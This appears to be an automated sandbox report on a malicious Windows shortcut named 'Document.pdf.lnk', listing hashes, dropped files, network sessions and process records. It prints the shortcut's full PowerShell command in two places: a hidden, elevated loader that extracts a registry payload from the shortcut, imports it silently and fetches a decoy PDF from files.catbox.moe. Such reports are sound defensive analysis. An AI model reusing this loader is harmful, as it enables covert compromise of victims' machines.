                                                        Entropy (8bit):3.7330070876687684
                                                        Encrypted:false
                                                        SSDEEP:48:vkYIzVwLPr3C4U28PjkukvhkvklCywVmdJ+qml4BSogZoop+qml4BSogZoM1:cZw33CxHPZkvhkvCCtk+qm/Hj+qm/H7
                                                        MD5:622D5D8370EB2C0449E1A21B9785B291
                                                        SHA1:759C91AD7A71A00FCE8D3A539F22F3AAC32976EA
                                                        SHA-256:F34154E4683B9383EC896C89694615570DA54C66D2F40D568178C5D0BC25764B
                                                        SHA-512:7D66CBD877ACF6624186EF77890428BF7155F0466A95D81150DE28E6B8486E6571F5440571CEBCE4F3B1330F87EC53E3FF27AD6B34BC14A6CFAE3939FF190495
                                                        Malicious:false
                                                        Preview:...................................FL..................F.".. ...-/.v.......L.U..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....=.g>.U..m..M.U......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BXdR...........................%..A.p.p.D.a.t.a...B.V.1.....BXbR..Roaming.@......CW.^BXbR..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^BXeR..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWU`..Windows.@......CW.^DWU`...........................g..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^BXnR....Q...........
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):6221
                                                        Entropy (8bit):3.7330070876687684
                                                        Encrypted:false
                                                        SSDEEP:48:vkYIzVwLPr3C4U28PjkukvhkvklCywVmdJ+qml4BSogZoop+qml4BSogZoM1:cZw33CxHPZkvhkvCCtk+qm/Hj+qm/H7
                                                        MD5:622D5D8370EB2C0449E1A21B9785B291
                                                        SHA1:759C91AD7A71A00FCE8D3A539F22F3AAC32976EA
                                                        SHA-256:F34154E4683B9383EC896C89694615570DA54C66D2F40D568178C5D0BC25764B
                                                        SHA-512:7D66CBD877ACF6624186EF77890428BF7155F0466A95D81150DE28E6B8486E6571F5440571CEBCE4F3B1330F87EC53E3FF27AD6B34BC14A6CFAE3939FF190495
                                                        Malicious:false
                                                        Preview:...................................FL..................F.".. ...-/.v.......L.U..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....=.g>.U..m..M.U......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BXdR...........................%..A.p.p.D.a.t.a...B.V.1.....BXbR..Roaming.@......CW.^BXbR..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^BXeR..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWU`..Windows.@......CW.^DWU`...........................g..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^BXnR....Q...........
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):6221
                                                        Entropy (8bit):3.727550994343201
                                                        Encrypted:false
                                                        SSDEEP:48:LqYIzVyLQr3CBU2yPjkukvhkvklCywVmdJ+qml4BSogZoop+qml4BSogZoM1:+Zyq3CeRPZkvhkvCCtk+qm/Hj+qm/H7
                                                        MD5:6712697F1F40B4A6558250676E5FDA65
                                                        SHA1:75DCDBE1859218D9D5D32D8DF2D6E2F6D98B0E80
                                                        SHA-256:291C5396B6F21E0B47CBB5226764B65078A300E77E7472ECAF10A7A396B3F11A
                                                        SHA-512:7E89EFA001575106271D23288B4E7EB13F5CEF1F17A3D893097B9A70088813076C7A7ECBDB30BB174F951DD33D010EDCE9EDEFF1E05D744E75A563A7BD1CF052
                                                        Malicious:false
                                                        Preview:...................................FL..................F.".. ...-/.v.....B.N.U..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....=.g>.U..n..R.U......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BXdR...........................%..A.p.p.D.a.t.a...B.V.1.....BXbR..Roaming.@......CW.^BXbR..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^BXeR..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWU`..Windows.@......CW.^BXnR...........................g..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^BXnR....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^BXnR....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^BXnR..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^BXnR....Q...........
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):5400
                                                        Entropy (8bit):3.491431014566933
                                                        Encrypted:false
                                                        SSDEEP:48:fi1rSr3CdLXuHuJ+qmlRBSogZoop+qml4BSogZoM1:6g6uW+qmsHj+qm/H7
                                                        MD5:6E35EE65108C96F32F34AC5A0240299A
                                                        SHA1:5BDC1F314E8CFDE35D73FD01DCAD14574419FAC3
                                                        SHA-256:F735CB6710892A0112D8E5E953C37AA4AF6A32ECD8E8FDED438D7C5AB46528A3
                                                        SHA-512:CE3408A74F0E20D06F5C8FB6E1CC664CADA7AE9504C32F8F220A42B21B03445AD310657A8F74886FC5926E47F9D7B6601E470291152F1A22ABEE765EC90F1EEC
                                                        Malicious:false
                                                        Preview:...................................FL..................F.`.. ..............C.U..$.uB.U..ew...........................P.O. .:i.....+00.:...:..,.LB.)...A&...&......-/.v..............C.U....n.2.ew..BXeR .DOCUME~1.LNK..R......DWT`BXeR............................l.D.o.c.u.m.e.n.t...p.d.f...l.n.k.......V...............-.......U............W.......C:\Users\user\Desktop\Document.pdf.lnk..<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.........%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe...........................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e...........................................................................................................
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):6221
                                                        Entropy (8bit):3.7330070876687684
                                                        Encrypted:false
                                                        SSDEEP:48:vkYIzVwLPr3C4U28PjkukvhkvklCywVmdJ+qml4BSogZoop+qml4BSogZoM1:cZw33CxHPZkvhkvCCtk+qm/Hj+qm/H7
                                                        MD5:622D5D8370EB2C0449E1A21B9785B291
                                                        SHA1:759C91AD7A71A00FCE8D3A539F22F3AAC32976EA
                                                        SHA-256:F34154E4683B9383EC896C89694615570DA54C66D2F40D568178C5D0BC25764B
                                                        SHA-512:7D66CBD877ACF6624186EF77890428BF7155F0466A95D81150DE28E6B8486E6571F5440571CEBCE4F3B1330F87EC53E3FF27AD6B34BC14A6CFAE3939FF190495
                                                        Malicious:false
                                                        Preview:...................................FL..................F.".. ...-/.v.......L.U..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....=.g>.U..m..M.U......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^BXdR...........................%..A.p.p.D.a.t.a...B.V.1.....BXbR..Roaming.@......CW.^BXbR..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^BXeR..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWU`..Windows.@......CW.^DWU`...........................g..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^BXnR....Q...........
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):5400
                                                        Entropy (8bit):3.491431014566933
                                                        Encrypted:false
                                                        SSDEEP:48:fi1rSr3CdLXuHuJ+qmlRBSogZoop+qml4BSogZoM1:6g6uW+qmsHj+qm/H7
                                                        MD5:6E35EE65108C96F32F34AC5A0240299A
                                                        SHA1:5BDC1F314E8CFDE35D73FD01DCAD14574419FAC3
                                                        SHA-256:F735CB6710892A0112D8E5E953C37AA4AF6A32ECD8E8FDED438D7C5AB46528A3
                                                        SHA-512:CE3408A74F0E20D06F5C8FB6E1CC664CADA7AE9504C32F8F220A42B21B03445AD310657A8F74886FC5926E47F9D7B6601E470291152F1A22ABEE765EC90F1EEC
                                                        Malicious:false
                                                        Preview:...................................FL..................F.`.. ..............C.U..$.uB.U..ew...........................P.O. .:i.....+00.:...:..,.LB.)...A&...&......-/.v..............C.U....n.2.ew..BXeR .DOCUME~1.LNK..R......DWT`BXeR............................l.D.o.c.u.m.e.n.t...p.d.f...l.n.k.......V...............-.......U............W.......C:\Users\user\Desktop\Document.pdf.lnk..<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.........%ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe...........................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e...........................................................................................................
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):55
                                                        Entropy (8bit):4.306461250274409
                                                        Encrypted:false
                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                        Malicious:false
                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                        File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=13, Archive, ctime=Wed Nov 15 15:04:31 2023, mtime=Wed Jan 24 17:43:41 2024, atime=Wed Nov 15 15:04:31 2023, length=491520, window=hidenormalshowminimized
                                                        Entropy (8bit):5.2460534252763384
                                                        TrID:
                                                        • Windows Shortcut (20020/1) 100.00%
                                                        File name:Document.pdf.lnk
                                                        File size:423'781 bytes
                                                        MD5:1cdf8cedd29b81b611e4dd2bbf3b5e08
                                                        SHA1:79ae856226052b05ec389b2db7cdfd429418f760
                                                        SHA256:abd4dcb78a92e4f98b88199ce08f88a3ce99032390747de6f3222f8d4a71939d
                                                        SHA512:a2fead01a1d87cac50d6945c05a5ebc22477d52f5c7b7d0d1a1e093024e060275ccbff026510b2103223a068c29b5964382e684d3cde0c41542a91f25c6a3a82
                                                        SSDEEP:6144:LanfOsXsSiRVKva4ygDTeCcnsEJWGd93nLYDG3djdsP/zQ/4rHTFKBS9TP0ey:La9XWVtg27nZZndzs3z5HT90R
                                                        TLSH:B6948CD930C2B270DA65EB794335FDA5531BA35B15309C2EB03D03E00BA9BE9DA1958F
                                                        File Content Preview:L..................F.@.. ......k.......@.N..G..k.................................P.O. .:i.....+00.../C:\...................V.1.....+XV...Windows.@........T,*8X.......l......................'.W.i.n.d.o.w.s.....Z.1.....7X.j..System32..B........T,*8XE.......
                                                        Icon Hash:696951d5dddb4965

                                                        General

                                                        Relative Path:..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Command Line Argument: -c "& {$currentPath = (Get-Location).Path; Start-Process powershell -WindowStyle Hidden -Verb RunAs -ArgumentList ('-Command Set-Location -Path ''\"' + $currentPath + '\"'' ;$dirPath = Get-Location;Set-Location -Path ''\"' + $dirPath.Path + '\"'' ;$lnkpaths = Get-ChildItem -Path ''\"' + $dirPath.Path + '\"'' -Recurse *.lnk | Where-Object { $_.length -eq 423781 } | Select-Object -ExpandProperty FullName;$lnkpath = if ($lnkpaths -is [array]) {$lnkpaths[0]} else {$lnkpaths};$exeFile = Get-Content $lnkpath -Encoding Byte -TotalCount 423781 -ReadCount 423781;$exePath = Join-Path $env:public ''17399.reg'';Set-Content $exePath ([byte[]]($exeFile | Select-Object -Skip 4901)) -Encoding Byte;Start-Process -FilePath ''regedit'' -ArgumentList ''/s'', $exePath;$a=''http://files.catbox.moe/p1yr9i.pdf'';$d=$env:TEMP + ''\Document.pdf'';Invoke-WebRequest -Uri $a -OutFile $d; Invoke-Item $d')}"
                                                        Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Feb 2, 2024 11:19:16.079031944 CET4972980192.168.2.4108.181.20.35
                                                        Feb 2, 2024 11:19:16.225984097 CET8049729108.181.20.35192.168.2.4
                                                        Feb 2, 2024 11:19:16.228441000 CET4972980192.168.2.4108.181.20.35
                                                        Feb 2, 2024 11:19:16.251246929 CET4972980192.168.2.4108.181.20.35
                                                        Feb 2, 2024 11:19:16.398184061 CET8049729108.181.20.35192.168.2.4
                                                        Feb 2, 2024 11:19:16.398207903 CET8049729108.181.20.35192.168.2.4
                                                        Feb 2, 2024 11:19:16.398222923 CET8049729108.181.20.35192.168.2.4
                                                        Feb 2, 2024 11:19:16.398701906 CET4972980192.168.2.4108.181.20.35
                                                        Feb 2, 2024 11:19:16.428217888 CET49730443192.168.2.4108.181.20.35
                                                        Feb 2, 2024 11:19:16.428283930 CET44349730108.181.20.35192.168.2.4
                                                        Feb 2, 2024 11:19:16.428354979 CET49730443192.168.2.4108.181.20.35
                                                        Feb 2, 2024 11:19:16.525166035 CET49730443192.168.2.4108.181.20.35
                                                        Feb 2, 2024 11:19:16.525197983 CET44349730108.181.20.35192.168.2.4
                                                        Feb 2, 2024 11:19:16.999367952 CET44349730108.181.20.35192.168.2.4
                                                        Feb 2, 2024 11:19:16.999516964 CET49730443192.168.2.4108.181.20.35
                                                        Feb 2, 2024 11:19:17.003856897 CET49730443192.168.2.4108.181.20.35
                                                        Feb 2, 2024 11:19:17.003869057 CET44349730108.181.20.35192.168.2.4
                                                        Feb 2, 2024 11:19:17.004282951 CET44349730108.181.20.35192.168.2.4
                                                        Feb 2, 2024 11:19:17.031605959 CET49730443192.168.2.4108.181.20.35
                                                        Feb 2, 2024 11:19:17.077914000 CET44349730108.181.20.35192.168.2.4
                                                        Feb 2, 2024 11:19:17.422189951 CET44349730108.181.20.35192.168.2.4
                                                        Feb 2, 2024 11:19:17.422225952 CET44349730108.181.20.35192.168.2.4
                                                        Feb 2, 2024 11:19:17.422245979 CET44349730108.181.20.35192.168.2.4
                                                        Feb 2, 2024 11:19:17.422353029 CET49730443192.168.2.4108.181.20.35
                                                        Feb 2, 2024 11:19:17.422382116 CET44349730108.181.20.35192.168.2.4
                                                        Feb 2, 2024 11:19:17.422404051 CET49730443192.168.2.4108.181.20.35
                                                        Feb 2, 2024 11:19:17.422450066 CET49730443192.168.2.4108.181.20.35
                                                        Feb 2, 2024 11:19:17.500072002 CET49730443192.168.2.4108.181.20.35
                                                        Feb 2, 2024 11:19:17.841355085 CET4972980192.168.2.4108.181.20.35
                                                        Feb 2, 2024 11:19:30.722718000 CET49745443192.168.2.4184.25.164.138
                                                        Feb 2, 2024 11:19:30.722776890 CET44349745184.25.164.138192.168.2.4
                                                        Feb 2, 2024 11:19:30.722846985 CET49745443192.168.2.4184.25.164.138
                                                        Feb 2, 2024 11:19:30.723103046 CET49745443192.168.2.4184.25.164.138
                                                        Feb 2, 2024 11:19:30.723135948 CET44349745184.25.164.138192.168.2.4
                                                        Feb 2, 2024 11:19:31.040115118 CET44349745184.25.164.138192.168.2.4
                                                        Feb 2, 2024 11:19:31.041099072 CET49745443192.168.2.4184.25.164.138
                                                        Feb 2, 2024 11:19:31.041165113 CET44349745184.25.164.138192.168.2.4
                                                        Feb 2, 2024 11:19:31.044879913 CET44349745184.25.164.138192.168.2.4
                                                        Feb 2, 2024 11:19:31.044976950 CET49745443192.168.2.4184.25.164.138
                                                        Feb 2, 2024 11:19:31.067001104 CET49745443192.168.2.4184.25.164.138
                                                        Feb 2, 2024 11:19:31.067207098 CET44349745184.25.164.138192.168.2.4
                                                        Feb 2, 2024 11:19:31.067251921 CET49745443192.168.2.4184.25.164.138
                                                        Feb 2, 2024 11:19:31.113007069 CET49745443192.168.2.4184.25.164.138
                                                        Feb 2, 2024 11:19:31.113040924 CET44349745184.25.164.138192.168.2.4
                                                        Feb 2, 2024 11:19:31.169857979 CET44349745184.25.164.138192.168.2.4
                                                        Feb 2, 2024 11:19:31.169933081 CET49745443192.168.2.4184.25.164.138
                                                        Feb 2, 2024 11:19:31.170639992 CET49745443192.168.2.4184.25.164.138
                                                        Feb 2, 2024 11:19:31.170675039 CET44349745184.25.164.138192.168.2.4
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Feb 2, 2024 11:19:15.907681942 CET5881653192.168.2.41.1.1.1
                                                        Feb 2, 2024 11:19:16.026357889 CET53588161.1.1.1192.168.2.4
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Feb 2, 2024 11:19:15.907681942 CET192.168.2.41.1.1.10xe0Standard query (0)files.catbox.moeA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Feb 2, 2024 11:19:16.026357889 CET1.1.1.1192.168.2.40xe0No error (0)files.catbox.moe108.181.20.35A (IP address)IN (0x0001)false
                                                        • files.catbox.moe
                                                        • armmf.adobe.com
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.449729108.181.20.35801196C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 11:19:16.251246929 CET171OUTGET /p1yr9i.pdf HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                        Host: files.catbox.moe
                                                        Connection: Keep-Alive
                                                        Feb 2, 2024 11:19:16.398207903 CET1286INHTTP/1.1 301 Moved Permanently
                                                        Server: nginx
                                                        Date: Fri, 02 Feb 2024 10:19:16 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 162
                                                        Connection: keep-alive
                                                        Location: https://files.catbox.moe/p1yr9i.pdf
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block
                                                        X-Frame-Options: DENY
                                                        Content-Security-Policy: default-src 'self'; img-src 'self' https://files.catbox.moe; media-src 'self' https://files.catbox.moe; style-src 'self' 'unsafe-inline'; script-src https://www.google.com https://www.gstatic.com 'self' 'unsafe-inline'; frame-src https://www.google.com;
                                                        Referrer-Policy: same-origin
                                                        Permissions-Policy: accelerometer=(),ambient-light-sensor=(),autoplay=(),battery=(),camera=(),display-capture=(),document-domain=(),encrypted-media=(),execution-while-not-rendered=(),execution-while-out-of-viewport=(),fullscreen=(),gamepad=(),geolocation=(),gyroscope=(),hid=(),identity-credentials-get=(),idle-detection=(),local-fonts=(),magnetometer=(),microphone=(),midi=(),otp-credentials=(),payment=(),picture-in-picture=(),publickey-credentials-create=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),speaker-selection=(),storage-access=(),usb=(),web-share=(),xr-spatial-tracking=()
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html>
                                                        Feb 2, 2024 11:19:16.398222923 CET154INData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50
                                                        Data Ascii: <head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.449730108.181.20.354431196C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-02-02 10:19:17 UTC171OUTGET /p1yr9i.pdf HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                        Host: files.catbox.moe
                                                        Connection: Keep-Alive
                                                        2024-02-02 10:19:17 UTC540INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Fri, 02 Feb 2024 10:19:17 GMT
                                                        Content-Type: application/pdf
                                                        Content-Length: 20619
                                                        Last-Modified: Wed, 24 Jan 2024 19:40:16 GMT
                                                        Connection: close
                                                        ETag: "65b167a0-508b"
                                                        X-Content-Type-Options: nosniff
                                                        Content-Security-Policy: default-src 'self' https://files.catbox.moe; style-src https://files.catbox.moe 'unsafe-inline'; img-src 'self' data:; font-src 'self'; media-src 'self'; object-src 'self';
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET, HEAD
                                                        Accept-Ranges: bytes
                                                        2024-02-02 10:19:17 UTC15844INData Raw: 25 50 44 46 2d 31 2e 37 0a 25 e2 e3 cf d3 0a 31 20 30 20 6f 62 6a 20 0a 3c 3c 0a 2f 43 6f 6c 6f 72 53 70 61 63 65 20 2f 44 65 76 69 63 65 52 47 42 0a 2f 53 75 62 74 79 70 65 20 2f 49 6d 61 67 65 0a 2f 48 65 69 67 68 74 20 34 34 31 0a 2f 46 69 6c 74 65 72 20 2f 44 43 54 44 65 63 6f 64 65 0a 2f 54 79 70 65 20 2f 58 4f 62 6a 65 63 74 0a 2f 44 65 63 6f 64 65 50 61 72 6d 73 20 0a 3c 3c 0a 2f 51 75 61 6c 69 74 79 20 38 30 0a 3e 3e 0a 2f 57 69 64 74 68 20 36 32 36 0a 2f 42 69 74 73 50 65 72 43 6f 6d 70 6f 6e 65 6e 74 20 38 0a 2f 4c 65 6e 67 74 68 20 31 39 37 37 32 0a 3e 3e 0a 73 74 72 65 61 6d 0a ff d8 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26
                                                        Data Ascii: %PDF-1.7%1 0 obj <</ColorSpace /DeviceRGB/Subtype /Image/Height 441/Filter /DCTDecode/Type /XObject/DecodeParms <</Quality 80>>/Width 626/BitsPerComponent 8/Length 19772>>streamC%# , #&
                                                        2024-02-02 10:19:17 UTC4775INData Raw: 11 f2 28 27 0d d2 32 28 03 bb d7 7c 4d a3 4f a4 43 0f fc 24 23 49 b8 d4 6d d6 6b 76 5d a2 e5 63 60 0e e5 8d c1 39 c1 ee a7 04 d6 2f 83 7c 23 e0 db 8b 49 93 4b d4 6e b5 95 8e 42 2e 7c fd 4e 59 89 91 b0 49 99 37 60 be 31 f7 97 3e 9c 57 5d e1 9f 0e 69 5e 1a b0 4b 4d 1a ca 1b 74 0a a1 dd 46 5e 52 aa 14 33 b1 cb 31 c0 03 24 93 c0 ac af 1d 5a ad 84 50 f8 96 cc 24 37 fa 73 a3 4b 20 1f eb ad 8b 01 2c 4f 8e a3 69 2c be 8e aa 7a 64 10 0d 7d 33 c3 7a 26 94 b8 d3 74 7d 3a d0 75 fd c5 b2 27 3f 80 ad 60 a0 0c 00 00 f6 a5 14 50 01 8c f5 ac 8d 53 c3 9a 2e ac 00 d4 f4 9b 1b a2 0e e5 69 a0 56 2a 7d 41 23 20 fd 2b 5e 8a 00 e4 65 f0 de a5 a4 83 2f 85 35 69 d3 69 2d fd 9f a9 48 d7 16 f2 64 e4 80 ed 99 63 e3 20 10 c5 46 7e e1 c6 2b 4b c3 5a f2 6b 22 ea 19 ad a5 b1 d4 ac dc 47
                                                        Data Ascii: ('2(|MOC$#Imkv]c`9/|#IKnB.|NYI7`1>W]i^KMtF^R31$ZP$7sK ,Oi,zd}3z&t}:u'?`PS.iV*}A# +^e/5ii-Hdc F~+KZk"G


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.449745184.25.164.1384437800C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-02-02 10:19:31 UTC475OUTGET /onboarding/smskillreader.txt HTTP/1.1
                                                        Host: armmf.adobe.com
                                                        Connection: keep-alive
                                                        Accept-Language: en-US,en;q=0.9
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        If-None-Match: "78-5faa31cce96da"
                                                        If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
                                                        2024-02-02 10:19:31 UTC198INHTTP/1.1 304 Not Modified
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Last-Modified: Mon, 01 May 2023 15:02:33 GMT
                                                        ETag: "78-5faa31cce96da"
                                                        Date: Fri, 02 Feb 2024 10:19:31 GMT
                                                        Connection: close


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:11:19:10
                                                        Start date:02/02/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "& {$currentPath = (Get-Location).Path; Start-Process powershell -WindowStyle Hidden -Verb RunAs -ArgumentList ('-Command Set-Location -Path ''\"' + $currentPath + '\"'' ;$dirPath = Get-Location;Set-Location -Path ''\"' + $dirPath.Path + '\"'' ;$lnkpaths = Get-ChildItem -Path ''\"' + $dirPath.Path + '\"'' -Recurse *.lnk | Where-Object { $_.length -eq 423781 } | Select-Object -ExpandProperty FullName;$lnkpath = if ($lnkpaths -is [array]) {$lnkpaths[0]} else {$lnkpaths};$exeFile = Get-Content $lnkpath -Encoding Byte -TotalCount 423781 -ReadCount 423781;$exePath = Join-Path $env:public ''17399.reg'';Set-Content $exePath ([byte[]]($exeFile | Select-Object -Skip 4901)) -Encoding Byte;Start-Process -FilePath ''regedit'' -ArgumentList ''/s'', $exePath;$a=''http://files.catbox.moe/p1yr9i.pdf'';$d=$env:TEMP + ''\Document.pdf'';Invoke-WebRequest -Uri $a -OutFile $d; Invoke-Item $d')}
                                                        Imagebase:0x7ff788560000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:1
                                                        Start time:11:19:10
                                                        Start date:02/02/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
